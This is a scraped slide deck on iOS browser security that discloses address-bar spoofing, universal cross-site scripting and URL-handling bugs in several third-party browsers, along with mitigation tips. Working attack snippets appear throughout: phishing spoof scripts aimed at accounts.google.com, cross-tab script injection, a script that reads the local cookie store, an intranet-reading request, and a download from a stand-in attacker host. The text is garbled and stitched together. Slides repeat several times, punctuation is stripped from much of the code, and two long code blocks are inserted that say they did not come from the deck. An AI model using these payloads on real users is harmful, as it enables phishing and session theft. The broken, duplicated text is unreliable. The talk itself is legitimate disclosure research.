bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 25: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/25.jpg)
Address Bar Spoofing Init amp Interrupt
Address Bar Spoofing
Init amp InterruptInitialise window with target URL replace with phishing content before it loads
bull w = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Optionally fall-back to native windowopen
bull delete windowopenw = windowopen(lsquohttpsaccountsgooglecomrsquo) wdocumentwrite(hellip)
Address Bar Spoofing
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
CVE-2013-7197 Yandex UXSS
bull Same-origin check implemented on windowopen()
bull Not rechecked on windowdocumentwrite()
bull Redirect child window after windowopen()
UXSS
UXSS Universal Cross-Site Scripting
Bug Bounty-)
CVE-2012-2899UXSS in Google Chrome
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(locationhref)wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURLhref]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull w = windowopen(lsquoaboutblankrsquo)wdocumentwrite(hellip)
bull aboutblank is kind of ldquono URLrdquo right
bull [webView loadHTMLStringldquohelliprdquo baseURLnil]
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSS
bull For baseURL = nilUIWebView loads applewebdata origin Same as file - no same-origin policy access to any web origin and local files
UXSS Universal Cross-Site Scripting
CVE-2012-2899 Chrome UXSSbull w = windowopen(lsquoaboutblankrsquo)
wdocumentwrite( lsquoltscriptgtdocumentwrite(locationhref)ltscriptgtrsquo )
bull applewebdata origin
bull UXSS + local file access (application sandboxjailbreak)
UXSS Universal Cross-Site Scripting
Bug Bounty-)
Safe cross-tab documentwrite
bull w = windowopen(locationhref) wdocumentwrite(lsquoHirsquo)
bull [webView loadHTMLStringldquoHirdquo baseURL [NSURL hellipldquoaboutblankrdquo]
UXSS Universal Cross-Site Scripting
Safe cross-tab documentwrite
bull iOS8 use WKWebViewUIDelegate webViewcreateWebViewWithConfigurationforNavigationActionwindowFeatures
UXSS Universal Cross-Site Scripting
Other potential paths to applewebdata or file originbull baseURL
[NSURL URLWithStringldquohttpexamplecomrdquo] mdashgt nil
bull CFURLCreateWithString(kCFAllocatorDefault CFSTR(ldquohttpexamplecom) NULL) mdashgt NULL
bull Downloads opened directly from file
UXSS Universal Cross-Site Scripting
Content-Disposition attachmentbull displayed in the origin of hosting site (iOS lt 5)
CVE-2011-3426 Christian Matthies Yoshinori Oota
bull isolated attachment origin (iOS 5 +)
bull documentlocationhref
bull documentreferrer
bull w=windowopen(lsquohttpsrsquo+locationhostname) wdocumentwrite(lsquocustom SOP implementationrsquo)
UXSS Universal Cross-Site Scripting
Content-Typebull textplain
HTML (iOS lt 7) CVE-2013-5151 Ben Toews
bull applicationoctet-stream HTML
bull applicationother filenamehtml
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Opera Coast:

    Program received signal EXC_BAD_ACCESS, Could not access memory.
    Reason: KERN_INVALID_ADDRESS at address: 0x00000000
    0x2f3e0d76 in CFURLCopyPath ()

• Special guest star: Safari on OS X Mavericks before Security Update 2014-02 (CVE-2014-1315)

    <iframe src="lets-try-format-string:%p%p%p%p…">
SSL & password managers

SSL
• By default, invalid certificates for iOS UIWebView https requests are rejected without user interaction
• This can be changed (e.g. allowing a user to accept a self-signed cert)
• 14 of tested browsers: self-signed SSL certificates are silently accepted
• In some cases the validation is done for the main domain only (e.g. Opera Coast < 3.0.2)
Password managers
• JavaScript with the privileges of the top frame → passwords not filled for subframes
• Usually possible to force saving a password for another domain (with/without user interaction)
• Password filling checks the domain but not always the URL scheme (https vs http)
Summary
• UIWebViews should be replaced with iOS 8 WKWebViews in browser applications
• Most 3rd-party iOS browsers are experimental or side projects built with less attention to detail
• Mobile device management and other enterprise solutions often include a browser application. Did you test it?
References
• https://developer.apple.com/library/ios/documentation/AppleApplications/Reference/SafariWebContent/
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebView_Class/Reference/Reference.html
• https://developer.apple.com/library/ios/documentation/UIKit/Reference/UIWebViewDelegate_Protocol/Reference/Reference.html
• https://developer.apple.com/library/mac/documentation/corefoundation/Reference/CFURLRef/Reference/reference.html
• https://developer.apple.com/library/prerelease/ios/documentation/WebKit/Reference/WKWebView_Ref/index.html
• https://code.google.com/p/browsersec/
• http://www.w3.org/TR/CSP/
• http://www.slideshare.net/iphonepentest/ios-application-insecurity
• https://labs.mwrinfosecurity.com/blog/2012/04/16/adventures-with-ios-uiwebviews/
• http://www.shmoo.com/idn/
• http://blog.chromium.org/2008/12/security-in-depth-local-web-pages.html
• http://research.microsoft.com/pubs/73101/guilogicsecurity.pdf
• http://gs.statcounter.com/
• https://code.google.com/p/chromium/issues/detail?id=146760
• https://code.google.com/p/chromium/issues/detail?id=147625
• https://code.google.com/p/chromium/issues/detail?id=324969
• https://code.google.com/p/chromium/issues/detail?id=326118
• https://code.google.com/p/chromium/issues/detail?id=326125
• https://code.google.com/p/chromium/issues/detail?id=348640
• http://blogs.opera.com/mobile/2014/05/opera-coast-updated-3-02/
• http://www.f-secure.com/en/web/labs_global/fsc-2014-4
• http://browser-shredders.blogspot.com/
• https://ios.browsr-tests.com/
Questions?

lukasz.pilorz@runic.pl, pawel.wylecial@gmail.com
Twitter: @runicpl, @h0wlu

Thank you!
Address Bar Spoofing

Init & Interrupt
Initialise the window with the target URL, then replace it with phishing content before it loads:
• w = window.open('https://accounts.google.com/'); w.document.write(…);
Optionally fall back to the native window.open:
• delete window.open; w = window.open('https://accounts.google.com/'); w.document.write(…);
Init & Interrupt
• CVE-2013-6895 Kaspersky Safe Browser
• CVE-2013-6898 F-Secure Safe Browser
• CVE-2013-6897 Dolphin Browser
• … and 45 of tested browsers
• Special guest star: Google Chrome for Android, CVE-2013-6642
Bug Bounty :-)
Failed Navigation
An incorrect URL often remains in the address bar after navigation errors:
• DNS NXDOMAIN - host not found (https://login.target.tld/)
• TCP port closed (https://www.target.tld:448/)
• SSL errors (https://target.tld/)
• Display the phishing page, then redirect to the "incorrect" URL
• Mobile Safari before iOS 7: window.focus() or window.open().close() allowed suppressing error alerts
Loading loop
• The HTTP request timeout in iOS browsers is usually between 1 and 10 minutes
• The address bar in Mobile Safari and many other iOS browsers is updated on the navigation attempt, even before an actual connection is made
• Now we only need to find a target with filtered port 443
• Or any filtered port, because Mobile Safari shows only the hostname part of the URL
• document.write('Phishing page here'); location = 'https://accounts.google.com:8443/'; setInterval(function() { location = 'https://accounts.google.com:8443/'; … })
Title bar
Phishing page with <title>https://www.apple.com/</title>
Address bar tips
• Display the URL that is currently loaded within the UIWebView, not the one you think will be there
• UIWebViewDelegate: update the address bar on each event, including webView:didFailLoadWithError:
• Displaying the SSL lock makes sense if there was an actual successful and valid SSL connection. Spoofing an https URL seems easy; don't make it worse by automatically adding the SSL lock
• iOS 8: KVO-compliant WKWebView.URL property
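The address-bar tips above as a small state model driven by the delegate events they name (an added example, not code from the slides or from any browser discussed here; the AddressBar class, its method names and the tlsValidated flag are assumptions made for illustration):

```javascript
// Added example: address-bar state that follows the tips on the slide.
// AddressBar, its method names and the tlsValidated flag are assumptions
// made here for illustration; the slide gives the rules, not this code.
class AddressBar {
  constructor(initialURL) {
    this.committedURL = initialURL; // URL of the document the view actually shows
    this.pendingURL = null;         // navigation attempt in flight, if any
    this.secure = false;            // SSL lock state for committedURL
  }

  // webView:shouldStartLoadWithRequest: / webViewDidStartLoad:
  // A request is only an attempt: it does not replace the displayed URL
  // (the "loading loop" spoof relies on bars that do) and it never earns a lock.
  didStartLoad(requestURL) {
    this.pendingURL = requestURL;
  }

  // webViewDidFinishLoad:
  // Take the URL from the view's current request (after redirects), not the
  // one we asked for, and grant the lock only for an https document whose
  // certificate chain was actually validated.
  didFinishLoad(currentRequestURL, tlsValidated) {
    this.committedURL = currentRequestURL;
    this.pendingURL = null;
    this.secure = currentRequestURL.startsWith("https://") && tlsValidated === true;
  }

  // webView:didFailLoadWithError:
  // The failed attempt (NXDOMAIN, closed port, SSL error, timeout) must not
  // linger in the bar: the view still shows the previous document.
  didFailLoad() {
    this.pendingURL = null;
  }

  // What the UI renders: the committed URL, a lock only for a validated
  // https connection, and the attempt in progress as a separate field so a
  // progress indicator can show it without it becoming "the address".
  display() {
    return {
      url: this.committedURL,
      lock: this.secure,
      loading: this.pendingURL,
    };
  }
}
```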
UXSS: Universal Cross-Site Scripting

Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users, bypassing the same-origin policy. In UXSS the attacker exploits a vulnerability in the browser, not in the website. (~ http://en.wikipedia.org/wiki/Cross-site_scripting)
Famous after the PDF UXSS in 2007.
Universal Cross-Site Scripting
• CVE-2013-6893: UXSS in Mercury Browser for iOS
• CVE-2013-7197: UXSS in Yandex.Browser for iOS
• CVE-2012-2899: UXSS in Google Chrome for iOS
• …

CVE-2013-6893: UXSS in Mercury Browser
CVE-2013-6893 Mercury UXSS

    w = window.open('about:blank')
→ mbexec://$(WINDOW_ID)/[{"command":"window.open", "target":1234, "url":"about:blank"}]  (target id from Math.random())
→ [webView loadRequest: … "about:blank" …]  (cross-frame forgery)

    w.document.write('Hi')
→ mbexec://$(WINDOW_ID)/[{"command":"window.document.write", "target":1234, "html":"Hi"}]
→ [webView stringByEvaluatingJavaScriptFromString: "document.write('Hi')"]

Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls. Any at all.

    w = window.open('https://accounts.google.com/'); w.document.write('<script src=…></script>');

… and it just works in accounts.google.com
CVE-2013-7197: UXSS in Yandex.Browser
• Same-origin check implemented on window.open()
• Not rechecked on window.document.write()
• Redirect the child window after window.open() → UXSS
Bug Bounty :-)
CVE-2012-2899: UXSS in Google Chrome
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:"Hi" baseURL:href]
• w = window.open('about:blank'); w.document.write(…)
• about:blank is kind of "no URL", right?
• [webView loadHTMLString:"…" baseURL:nil]
• For baseURL = nil, UIWebView loads the applewebdata:// origin. Same as file:// - no same-origin policy, access to any web origin and to local files
• w = window.open('about:blank'); w.document.write('<script>document.write(location.href)</script>') → applewebdata:// origin
• UXSS + local file access (application sandbox / jailbreak)
Bug Bounty :-)
Safe cross-tab document.write
• w = window.open(location.href); w.document.write('Hi')
• [webView loadHTMLString:"Hi" baseURL:[NSURL …"about:blank"]]
• iOS 8: use the WKWebView UIDelegate method webView:createWebViewWithConfiguration:forNavigationAction:windowFeatures:
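A model of the native side of a cross-tab bridge (mbexec:// style commands as shown for Mercury) that performs the checks the Mercury, Yandex and Chrome bugs above lacked: origin re-checked at write time against the target's current URL, and an about:blank child attributed to its opener instead of being loaded with baseURL:nil. This is an added example, not code from the slides or from any of the browsers named; BridgeDispatcher, its tab registry and the loadHTMLString-style result object are assumptions made for illustration.

```javascript
// Added example, not code from the slides or from any browser named there:
// a model of the native side of a cross-tab JavaScript bridge with the
// same-origin checks the Mercury (CVE-2013-6893), Yandex (CVE-2013-7197)
// and Chrome (CVE-2012-2899) bugs lacked. BridgeDispatcher, the tab
// registry and the result object are assumptions made here for illustration.

// Same-origin-policy origin of a URL. Schemes without a meaningful web
// origin (about:blank, file://, applewebdata://) yield null, an opaque
// origin that nothing compares equal to.
function originOf(url) {
  if (typeof url !== "string" || url === "about:blank") return null;
  let u;
  try { u = new URL(url); } catch (e) { return null; }
  if (u.protocol !== "http:" && u.protocol !== "https:") return null;
  return u.origin;
}

class BridgeDispatcher {
  constructor() {
    this.tabs = new Map(); // tab id -> { url, openerOrigin, navigated }
    this.nextId = 1;
  }

  // A tab the user navigated to directly (no opener).
  addTab(url) {
    const id = this.nextId++;
    this.tabs.set(id, { url, openerOrigin: null, navigated: true });
    return id;
  }

  // Native side of window.open(): the caller id comes from the scheme
  // handler ($(WINDOW_ID) on the slide), not from page content, so a page
  // cannot forge it. Remember the opener's origin so an about:blank child
  // can later be attributed to it instead of being loaded with baseURL:nil.
  open(callerId, url) {
    const caller = this.tabs.get(callerId);
    if (!caller) return null;
    const id = this.nextId++;
    this.tabs.set(id, {
      url,
      openerOrigin: originOf(caller.url),
      navigated: url !== "about:blank",
    });
    return id;
  }

  // Every navigation of a tab is recorded, including the redirect-after-open
  // trick from the Yandex slide: once the child shows a document from
  // elsewhere, the opener's claim on it ends.
  navigate(id, url) {
    const tab = this.tabs.get(id);
    if (!tab) return false;
    tab.url = url;
    tab.navigated = true;
    return true;
  }

  // Origin a document.write() into this tab would execute in right now.
  effectiveOrigin(tab) {
    if (tab.url === "about:blank" && !tab.navigated) return tab.openerOrigin;
    return originOf(tab.url);
  }

  // Native side of w.document.write(html). The same-origin check is redone
  // here, at write time, against the target's current URL. Returns the
  // arguments for loadHTMLString:baseURL:, or null when the write is refused.
  // baseURL is always a concrete web origin, never nil.
  write(callerId, targetId, html) {
    const caller = this.tabs.get(callerId);
    const target = this.tabs.get(targetId);
    if (!caller || !target) return null;
    const callerOrigin = originOf(caller.url);
    const targetOrigin = this.effectiveOrigin(target);
    if (callerOrigin === null || targetOrigin === null) return null;
    if (callerOrigin !== targetOrigin) return null;
    return { html, baseURL: callerOrigin + "/" };
  }
}
```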
Other potential paths to the applewebdata:// or file:// origin
• baseURL: [NSURL URLWithString:"http://example.com/…"] → nil
• CFURLCreateWithString(kCFAllocatorDefault, CFSTR("http://example.com/…"), NULL) → NULL
• Downloads opened directly from file://
Content-Disposition: attachment
• displayed in the origin of the hosting site (iOS < 5), CVE-2011-3426 (Christian Matthies, Yoshinori Oota)
• isolated attachment origin (iOS 5+)
• document.location.href
• document.referrer
• w = window.open('https://' + location.hostname); w.document.write('custom SOP implementation')
Content-Type
• text/plain → HTML (iOS < 7), CVE-2013-5151 (Ben Toews)
• application/octet-stream → HTML
• application/other, filename .html
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgta = documentlocationhrefsplit() if(a[0]===file) path = lsquofile+a[3]++a[4]++a[5]++a[6]+rsquo+a[7] path = path+LibraryCookiesCookiesbinarycookies x = new XMLHttpRequest() xopen(GET path false) xsend() alert(xresponseText) ltscriptgt
UXSS Universal Cross-Site Scripting
JS without Same-Origin-Policy
ltscriptgt x = new XMLHttpRequest() xopen(lsquoGET lsquohttpsyourintranet false) xsend() alert(xresponseText)ltscriptgt
UXSS Universal Cross-Site Scripting
ChallengeHijack password autofill
UXSS Universal Cross-Site Scripting
Opening local HTML files safely
bull Open as textplain
bull Content-Security-Policy header HTML5 sandbox
bull baseURL = aboutblank
bull iOS8 WKWebViewconfigurationpreferencesjavaScriptEnabled = false
UXSS Universal Cross-Site Scripting
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
Popups amp URL handling
Popups amp URL handling
bull Browsers rewriting href attributes for target=_blank can be usually tricked into believing navigation was initiated by user
bull ltiframe src=ldquogooglechromeexamplecomrdquogtltiframe src=ldquomercexamplecomrdquogtetc bypass all popup blockers anywayhellip
Popup blockers
Popups amp URL handling
Application(bolted-on)
Native (WebKit)
bull schemedownloadhttpssecuretldvictimdata schemedownloadhttpattackertldREADMEhtml
bull schemeadd-filterurl=
Bridge (internal)
URI schemes
Popups amp URL handling
Registered(external)
CFURL Null Pointer Dereferencebull Any CFURL function that gets NULL as an argument
will cause Null Pointer Dereference
bull Tested with percent encodinghttp http5 http5c etc
bull Example Opera Coast ltscriptgtdocumentlocation = lsquohttp5crsquoltscriptgt
Popups amp URL handling
Opera Coast
Program received signal EXC_BAD_ACCESS Could not access memory
Reason KERN_INVALID_ADDRESS at address 0x00000000
0x2f3e0d76 in CFURLCopyPath()
Popups amp URL handling
bull Special guest star Safari on OS X Mavericksbefore Security Update 2014-02 (CVE-2014-1315)
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
ltiframe src=ldquolets-try-format-stringpppphelliprdquogt
Popups amp URL handling
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
SSLbull By default invalid certificates for iOS UIWebView
https requests are rejected without user interaction
bull This can be changed (eg allowing a user to accept self-signed cert)
bull 14 of tested browsersself-signed SSL certificates are silently accepted
bull In some cases the validation is done for main domain only (eg Opera Coast lt 302)
SSL amp password managers
SSL amp password managers
Password managers
bull JavaScript with privileges of top frame mdashgt passwords not filled for subframes
bull Usually possible to force saving password for another domain (withwithout user interaction)
bull Password filling checks for domain but not always for URL scheme (https vs http)
SSL amp password managers
SSL amp password managers
Summary
bull UIWebViews should be replaced with iOS8 WKWebViews in browser applications
bull Most 3rd party iOS browsers are experimental or side projects built with less attention to detail
bull Mobile device management and other enterprise solutions often include a browser application Did you test it
Mobile Browsers Security iOS
Referencesbull httpsdeveloperapplecomlibraryiosdocumentation
AppleApplicationsReferenceSafariWebContent
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebView_ClassReferenceReferencehtml
bull httpsdeveloperapplecomlibraryiosdocumentationUIKitReferenceUIWebViewDelegate_ProtocolReferenceReferencehtml
bull httpsdeveloperapplecomlibrarymacdocumentationcorefoundationReferenceCFURLRefReferencereferencehtml
bull httpsdeveloperapplecomlibraryprereleaseiosdocumentationWebKitReferenceWKWebView_Refindexhtml
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompbrowsersec
bull httpwwww3orgTRCSP
bull httpwwwslidesharenetiphonepentestios-application-insecurity
bull httpslabsmwrinfosecuritycomblog20120416adventures-with-ios-uiwebviews
bull httpwwwshmoocomidn
bull httpblogchromiumorg200812security-in-depth-local-web-pageshtml
bull httpresearchmicrosoftcompubs73101guilogicsecuritypdf
bull httpgsstatcountercom
Mobile Browsers Security iOS
Referencesbull httpscodegooglecompchromiumissuesdetailid=146760
bull httpscodegooglecompchromiumissuesdetailid=147625
bull httpscodegooglecompchromiumissuesdetailid=324969
bull httpscodegooglecompchromiumissuesdetailid=326118
bull httpscodegooglecompchromiumissuesdetailid=326125
bull httpscodegooglecompchromiumissuesdetailid=348640
bull httpblogsoperacommobile201405opera-coast-updated-3-02
bull httpwwwf-securecomenweblabs_globalfsc-2014-4
Mobile Browsers Security iOS
References
bull httpbrowser-shreddersblogspotcom
bull httpsiosbrowsr-testscom
Mobile Browsers Security iOS
Questions
Mobile Browsers Security iOS
lukaszpilorzrunicpl pawelwylecialgmailcom
Twitter runicpl h0wlu
Thank you
Mobile Browsers Security iOS
![Page 27: Mobile Browsers Security: iOS · UIWebView & WKWebView. JavaScript used to implement browser features and to override native functions to bridge them with Objective-C code UIWebView](https://reader033.vdocuments.mx/reader033/viewer/2022041604/5e32c88e666d781cfd776496/html5/thumbnails/27.jpg)
Address Bar Spoofing
Init amp Interruptbull CVE-2013-6895 Kaspersky Safe Browser
bull CVE-2013-6898 F-Secure Safe Browser
bull CVE-2013-6897 Dolphin Browser
bull hellip and 45 of tested browsers
bull Special guest star Google Chrome for Android CVE-2013-6642
Address Bar Spoofing
Bug Bounty-)
Address Bar Spoofing Failed Navigation
Address Bar Spoofing
Failed NavigationIncorrect URL often remains in address bar after navigation errors
bull DNS NXDOMAIN - host not found (httpslogintargettld)
bull TCP port closed (httpswwwtargettld448)
bull SSL errors (httpstargettld)
bull Display phishing page then redirect to ldquoincorrectrdquo URL
bull Mobile Safari before iOS 7 windowfocus() or windowopen()close() allowed suppressing error alerts
Address Bar Spoofing
Address Bar Spoofing Loading loop
Address Bar Spoofing
Loading loopbull HTTP request timeout in iOS browsers is usually
between 1 and 10 minutes
bull Address bar in Mobile Safari and many other iOS browsers is updated on navigation attempt even before an actual connection is made
bull Now we only need to find a target with filtered port 443
bull Or any filtered port because Mobile Safari shows only the hostname part of the URL
Address Bar Spoofing
Loading loop
bull documentwrite(Phishing page here) location = httpsaccountsgooglecom8443setInterval(function() location=httpsaccountsgooglecom8443 hellip)
Address Bar Spoofing
Address Bar Spoofing
Phishing page
Title bar
Address Bar Spoofing
lttitlegthttpswwwapplecomlttitlegt
Address bar tipsbull Display the URL that is currently loaded within
UIWebView not the one you think will be there
bull UIWebViewDelegate Update address bar on each event including webViewdidFailLoadWithError
bull Displaying SSL lock makes sense if there was an actual successful and valid SSL connection Spoofing https URL seems easy donrsquot make it worse by automatically adding SSL lock
bull iOS8 KVO-compliant WKWebViewURL property
Address Bar Spoofing
In this presentation
bull iOS Browsers UIWebView WKWebView
bull Address Bar Spoofing
bull Universal Cross-Site Scripting
bull Popups amp URL handling
bull SSL amp password managers
Mobile Browsers Security iOS
UXSS UniversalCross-Site Scripting
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
XSS enables attackers to inject client-side script into web pages viewed by other users
bypassing same-origin policy
In UXSS the attacker exploits vulnerability in the browser not in the website
(~ httpenwikipediaorgwikiCross-site_scripting)
Famous after PDF UXSS in 2007
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
bull CVE-2013-6893 UXSS in Mercury Browser for iOS
bull CVE-2013-7197 UXSS in YandexBrowser for iOS
bull CVE-2012-2899 UXSS in Google Chrome for iOS
bull hellip
UXSS Universal Cross-Site Scripting
Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-6893UXSS in Mercury Browser
UXSS Universal Cross-Site Scripting
CVE-2013-6893 Mercury UXSS
w = windowopen(lsquoaboutblankrsquo)
mbexec$(WINDOW_ID)[ commandwindowopen target1234 ldquourlaboutblank ]
Mathrandom()
UXSS Universal Cross-Site Scripting
[webView loadRequest hellip ldquoaboutblankrdquo hellip]
cross-frame forgery
CVE-2013-6893 Mercury UXSS
wdocumentwrite(lsquoHirsquo)
mbexec$(WINDOW_ID)[ ldquocommandwindowdocumentwrite target1234 ldquohtmlrdquoHi ]
UXSS Universal Cross-Site Scripting
[webView stringByEvaluatingJavaScriptFromString ldquodocumentwrite(lsquoHirsquo)rdquo]
CVE-2013-6893 Mercury UXSS
Mercury Browser for iOS does not implement same-origin policy restrictions for cross-tab calls Any at all
w = windowopen(lsquohttpsaccountsgooglecom) wdocumentwrite(lsquoltscript src=hellipgtltscriptgtrsquo) hellipand it just works in accountsgooglecom
UXSS Universal Cross-Site Scripting
UXSS Universal Cross-Site Scripting
CVE-2013-7197UXSS in YandexBrowser
UXSS Universal Cross-Site Scripting
